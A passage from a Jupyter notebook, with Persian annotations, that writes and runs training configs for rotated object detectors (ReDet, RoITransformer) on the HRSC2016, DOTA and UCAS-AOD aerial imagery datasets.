'/content/ReDet/data/HRSC2016/'########################################\n###################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'Train/HRSC_L1_train.json',\n img_prefix=data_root + 'Train/images/',\n img_scale=(800, 512),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'Test/HRSC_L1_test.json',\n img_prefix=data_root + 'Test/images/',\n img_scale=(800, 512),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n ann_file=data_root + 'Test/HRSC_L1_test.json',\n img_prefix=data_root + 'Test/images/',\n img_scale=(800, 512),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[24, 33])\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=1,\n hooks=[\n dict(type='TextLoggerHook'),\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 36\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = '/content/ReDet/work_dirs/ReDet_re50_refpn_3x_hrsc2016'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\n\n# VOC2007 metrics\n# AP50: 90.46 AP75: 89.46 mAP: 70.41",
"_____no_output_____"
]
],
[
[
"faster_rcnn_RoITrans_r50_fpn_1x_dota config",
"_____no_output_____"
]
],
[
[
"# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py\n%%writefile /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py\n##########این کانفیگ از ریپازیتوری اصلی کپی شده\n\n# model settings\nmodel = dict(\n type='RoITransformer',\n pretrained='modelzoo://resnet50',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n # score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n\n# soft-nms is also supported for rcnn testing\n # e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)\n)\n# dataset settings\ndataset_type = 'DOTADataset'\n######################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/dota1024new/'\n######################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images/',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'test1024/DOTA_test1024.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'test1024/images',\n # img_prefix=data_root + 'val1024/images',\n # ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',\n # img_prefix=data_root + 'test1024_ms/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=50,\n hooks=[\n dict(type='TextLoggerHook'),\n # dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 12\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_1x_dota'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]",
"_____no_output_____"
]
],
[
[
"faster_rcnn_obb_r50_fpn_1x_dota config",
"_____no_output_____"
]
],
[
[
"# %pycat /content/ReDet/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py\n%%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py\n##########این کانفیگ از ریپازیتوری اصلی کپی شده\n\n\n\n# model settings\nmodel = dict(\n type='FasterRCNNOBB',\n pretrained='modelzoo://resnet50',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=16,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=False,\n with_module=False,\n hbb_trans='hbbpolyobb',\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False))\ntest_cfg = dict(\n rpn=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n # score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n# soft-nms is also supported for rcnn testing\n # e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)\n)\n# dataset settings\ndataset_type = 'DOTADataset'\n#################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/dota1024new/'\n#################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images/',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval1024/DOTA_trainval1024.json',\n img_prefix=data_root + 'trainval1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'test1024/DOTA_test1024.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'test1024/images',\n # img_prefix=data_root + 'val1024/images',\n img_scale=(1024, 1024),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=1)\n# yapf:disable\nlog_config = dict(\n interval=1,\n hooks=[\n dict(type='TextLoggerHook'),\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 12\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/faster_rcnn_obb_r50_fpn_1x_dota'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]",
"_____no_output_____"
]
],
[
[
"# UCAS_AOD config",
"_____no_output_____"
]
],
[
[
"# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py\n%%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py\n##########این کانفیگ از ریپازیتوری اصلی کپی شده\n\n# model settings\nmodel = dict(\n type='RoITransformer',\n pretrained='modelzoo://resnet50',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n ##############################################\n num_classes=2,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n ###################################################\n num_classes=2,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n # score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n\n# soft-nms is also supported for rcnn testing\n # e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)\n)\n# dataset settings\ndataset_type = 'UCASAOD'\n######################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/UCAS-AOD/'\n######################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'Train/mmtrain.json',\n img_prefix=data_root + 'Train/images/',\n img_scale=(659, 1280),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'val/mmval.json',\n img_prefix=data_root + 'val/images',\n img_scale=(659, 1280),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'Test/mmtest.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'Test/images',\n # img_prefix=data_root + 'val1024/images',\n # ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',\n # img_prefix=data_root + 'test1024_ms/images',\n img_scale=(659, 1280),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=6)\n# yapf:disable\nlog_config = dict(\n interval=6,\n hooks=[\n dict(type='TextLoggerHook'),\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 12\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]",
"_____no_output_____"
],
[
"# %pycat /content/ReDet/configs/DOTA/faster_rcnn_RoITrans_r50_fpn_1x_dota.py\n# %%writefile /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659.py\n##########این کانفیگ از ریپازیتوری اصلی کمک گرفته است\n\n# model settings\nmodel = dict(\n type='RoITransformer',\n pretrained='modelzoo://resnet50',\n backbone=dict(\n type='ResNet',\n depth=50,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n frozen_stages=1,\n style='pytorch'),\n neck=dict(\n type='FPN',\n in_channels=[256, 512, 1024, 2048],\n out_channels=256,\n num_outs=5),\n rpn_head=dict(\n type='RPNHead',\n in_channels=256,\n feat_channels=256,\n anchor_scales=[8],\n anchor_ratios=[0.5, 1.0, 2.0],\n anchor_strides=[4, 8, 16, 32, 64],\n target_means=[.0, .0, .0, .0],\n target_stds=[1.0, 1.0, 1.0, 1.0],\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),\n bbox_roi_extractor=dict(\n type='SingleRoIExtractor',\n roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n bbox_head=dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=3,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.1, 0.1, 0.2, 0.2, 0.1],\n reg_class_agnostic=True,\n with_module=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)),\n rbbox_roi_extractor=dict(\n type='RboxSingleRoIExtractor',\n roi_layer=dict(type='RoIAlignRotated', out_size=7, sample_num=2),\n out_channels=256,\n featmap_strides=[4, 8, 16, 32]),\n rbbox_head = dict(\n type='SharedFCBBoxHeadRbbox',\n num_fcs=2,\n in_channels=256,\n fc_out_channels=1024,\n roi_feat_size=7,\n num_classes=3,\n target_means=[0., 0., 0., 0., 0.],\n target_stds=[0.05, 0.05, 0.1, 0.1, 0.05],\n reg_class_agnostic=False,\n loss_cls=dict(\n type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),\n loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0))\n )\n# model training and testing settings\ntrain_cfg = dict(\n rpn=dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.7,\n neg_iou_thr=0.3,\n min_pos_iou=0.3,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=256,\n pos_fraction=0.5,\n neg_pos_ub=-1,\n add_gt_as_proposals=False),\n allowed_border=0,\n pos_weight=-1,\n debug=False),\n rpn_proposal=dict(\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=[\n dict(\n assigner=dict(\n type='MaxIoUAssignerCy',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False),\n dict(\n assigner=dict(\n type='MaxIoUAssignerRbbox',\n pos_iou_thr=0.5,\n neg_iou_thr=0.5,\n min_pos_iou=0.5,\n ignore_iof_thr=-1),\n sampler=dict(\n type='RandomRbboxSampler',\n num=512,\n pos_fraction=0.25,\n neg_pos_ub=-1,\n add_gt_as_proposals=True),\n pos_weight=-1,\n debug=False)\n ])\ntest_cfg = dict(\n rpn=dict(\n # TODO: test nms 2000\n nms_across_levels=False,\n nms_pre=2000,\n nms_post=2000,\n max_num=2000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n # score_thr=0.05, nms=dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img=1000)\n score_thr = 0.05, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='pesudo_nms_poly', iou_thr=0.9), max_per_img = 2000)\n # score_thr = 0.001, nms = dict(type='py_cpu_nms_poly_fast', iou_thr=0.1), max_per_img = 2000)\n\n# soft-nms is also supported for rcnn testing\n # e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)\n)\n# dataset settings\ndataset_type = 'UCASAOD'\n######################################################################################################################\n# data_root = '/content/ReDet/data/dota1_1024/'\n# data_root = '/content/ReDet/data/dota_redet/'\ndata_root = '/content/ReDet/data/UCAS_AOD659/'\n######################################################################################################################\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ndata = dict(\n imgs_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval659/DOTA_trainval659.json',\n img_prefix=data_root + 'trainval659/images/',\n img_scale=(659, 659),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0.5,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n val=dict(\n type=dataset_type,\n ann_file=data_root + 'trainval659/DOTA_trainval659.json',\n img_prefix=data_root + 'trainval659/images',\n img_scale=(659, 659),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=True,\n with_crowd=True,\n with_label=True),\n test=dict(\n type=dataset_type,\n #############################################################################################\n ann_file=data_root + 'test659/DOTA_test659.json',\n # ann_file=data_root + 'val1024/DOTA_val1024.json',\n img_prefix=data_root + 'test659/images',\n # img_prefix=data_root + 'val1024/images',\n # ann_file=data_root + 'test1024_ms/DOTA_test1024_ms.json',\n # img_prefix=data_root + 'test1024_ms/images',\n img_scale=(659, 659),\n img_norm_cfg=img_norm_cfg,\n size_divisor=32,\n flip_ratio=0,\n with_mask=False,\n with_label=False,\n test_mode=True))\n# optimizer\noptimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))\n# learning policy\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=500,\n warmup_ratio=1.0 / 3,\n step=[8, 11])\ncheckpoint_config = dict(interval=6)\n# yapf:disable\nlog_config = dict(\n interval=6,\n hooks=[\n dict(type='TextLoggerHook'),\n dict(type='TensorboardLoggerHook')\n ])\n# yapf:enable\n# runtime settings\ntotal_epochs = 36\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nwork_dir = './work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]",
"_____no_output_____"
]
],
[
[
"# آموزش شبکه",
"_____no_output_____"
]
],
[
[
"!python tools/train.py /content/AerialDetection/configs/DOTA/faster_rcnn_obb_r50_fpn_1x_dota.py --resume_from /content/AerialDetection/work_dirs/faster_rcnn_obb_r50_fpn_1x_dota/epoch_11.pth",
"_____no_output_____"
],
[
"!mv /content/AerialDetection/data/dota /content/drive/MyDrive/dota_dataaaaa",
"_____no_output_____"
]
],
[
[
"# UCAS_AOD آموزش",
"_____no_output_____"
]
],
[
[
"%cd /content/ReDet\n!python tools/train.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD.py \\\n# --resume_from /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_6.pth",
"_____no_output_____"
],
[
"%cd /content/ReDet\n!python tools/train.py /content/ReDet/configs/UCAS_AOD/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD_659.py \\\n# --resume_from /content/ReDet/work_dirs/faster_rcnn_RoITrans_r50_fpn_3x_UCAS_AOD/epoch_6.pth",
"_____no_output_____"
]
],
[
[
"# تست کردن شبکه",
"_____no_output_____"
],
[
"ReDet_re50_refpn_1x_dota1 test",
"_____no_output_____"
]
],
[
[
